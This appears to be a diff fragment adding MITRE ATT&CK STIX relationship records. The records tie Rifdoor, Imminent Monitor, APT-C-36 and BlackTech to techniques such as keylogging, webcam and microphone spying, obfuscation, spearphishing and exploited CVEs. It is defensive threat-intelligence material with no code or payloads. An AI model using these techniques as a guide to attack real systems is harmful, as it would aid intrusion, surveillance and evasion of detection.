+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7e80ade6-a566-4e2b-b2e4-021f9dd6889a",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.295Z",
+ "created": "2020-05-05T17:07:33.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted strings with a single byte XOR algorithm.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--081406d8-0486-4bfe-8d99-cd505f5cceb6",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.343Z",
+ "created": "2020-05-05T17:07:33.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the Windows version on the compromised host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0d557837-8936-43e7-95fd-2c30938d34d3",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.350Z",
+ "created": "2020-05-05T17:07:33.350Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the username on the compromised host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8087182b-73c3-4efa-aad6-36498531f728",
+ "type": "relationship",
+ "modified": "2020-05-05T17:07:33.356Z",
+ "created": "2020-05-05T17:07:33.356Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the IP address of the compromised host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--24dd7ee4-83ed-4f54-808b-8b0e46797df4",
+ "type": "relationship",
+ "modified": "2020-05-05T21:17:34.628Z",
+ "created": "2020-05-05T17:07:33.360Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)",
+ "relationship_type": "uses",
+ "id": "relationship--28d30695-5015-431d-baa6-9e75088a2a83",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.310Z",
+ "created": "2020-05-05T18:47:47.310Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7393547f-0d33-4070-9569-733e15c72e73",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.313Z",
+ "created": "2020-05-05T18:47:47.313Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e80f97df-4984-4e62-bba6-1333d4c2c977",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.317Z",
+ "created": "2020-05-05T18:47:47.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4151f66f-efcc-4c26-b3b6-8650c0a36258",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.346Z",
+ "created": "2020-05-05T18:47:47.346Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8f0e7661-fa5d-47c4-84b0-44cd31b49764",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.351Z",
+ "created": "2020-05-05T18:47:47.351Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a \"Process Watcher\" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4458ca35-0285-408b-9059-62c36086fd0a",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.353Z",
+ "created": "2020-05-05T18:47:47.353Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--62bf12af-cf11-48e7-8963-4fdf3e23fea0",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.370Z",
+ "created": "2020-05-05T18:47:47.370Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c068603b-bfab-4efd-92c2-01f8d696ea88",
+ "type": "relationship",
+ "modified": "2020-05-05T18:47:47.385Z",
+ "created": "2020-05-05T18:47:47.385Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.(Citation: QiAnXin APT-C-36 Feb2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--ee00cd55-254b-4780-be47-e0f78a327c93",
+ "type": "relationship",
+ "modified": "2020-05-05T19:37:33.806Z",
+ "created": "2020-05-05T18:53:08.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used ConfuserEx to obfuscate its variant of [Imminent Monitor](https://attack.mitre.org/software/S0434), compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7b4b8d0b-fbc3-469a-ab62-72c5c4c4653d",
+ "type": "relationship",
+ "modified": "2020-05-07T03:04:14.843Z",
+ "created": "2020-05-05T19:37:33.740Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used a macro function to set scheduled tasks, disguised as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aa5d5fcd-db19-4593-a958-b09853ceb372",
+ "type": "relationship",
+ "modified": "2020-05-06T18:42:54.351Z",
+ "created": "2020-05-05T19:37:33.765Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has prompted victims to accept macros in order to execute the subsequent payload.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--20599767-204a-4cbf-ada7-0f931ee925e4",
+ "type": "relationship",
+ "modified": "2020-05-05T19:37:33.769Z",
+ "created": "2020-05-05T19:37:33.769Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3f010259-666c-403b-b5c7-603b319583da",
+ "type": "relationship",
+ "modified": "2020-05-05T19:37:33.785Z",
+ "created": "2020-05-05T19:37:33.785Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used port 4050 for C2 communications.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--db0f9f05-6f76-47c3-81bf-a59d85045188",
+ "type": "relationship",
+ "modified": "2020-05-05T19:44:41.806Z",
+ "created": "2020-05-05T19:44:41.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--51cc3f41-f5aa-4d04-95de-15d96e103bac",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.062Z",
+ "created": "2020-05-05T20:54:53.062Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.",
+ "relationship_type": "uses",
+ "id": "relationship--66a14eeb-a6a0-4614-8224-7f238b3a83da",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.098Z",
+ "created": "2020-05-05T20:54:53.098Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--8c5e20b3-b15c-4c08-84fe-eeacd9209375",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.104Z",
+ "created": "2020-05-05T20:54:53.104Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious links to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)\t ",
+ "relationship_type": "uses",
+ "id": "relationship--036d9e28-e7c4-4865-b964-2ea213274521",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.107Z",
+ "created": "2020-05-05T20:54:53.107Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with links to cloud services to deliver malware.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--01455ab2-2769-4eab-9df2-e7e5f707e7c6",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.136Z",
+ "created": "2020-05-05T20:54:53.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with malicious documents to deliver malware.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--795b9ebc-6bf1-47f9-b236-117c2216c5d4",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.144Z",
+ "created": "2020-05-05T20:54:53.144Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious documents to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)\t ",
+ "relationship_type": "uses",
+ "id": "relationship--f6d1c615-16df-4527-ad74-ce8623f87ce0",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.140Z",
+ "created": "2020-05-05T20:54:53.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153",
+ "external_references": [
+ {
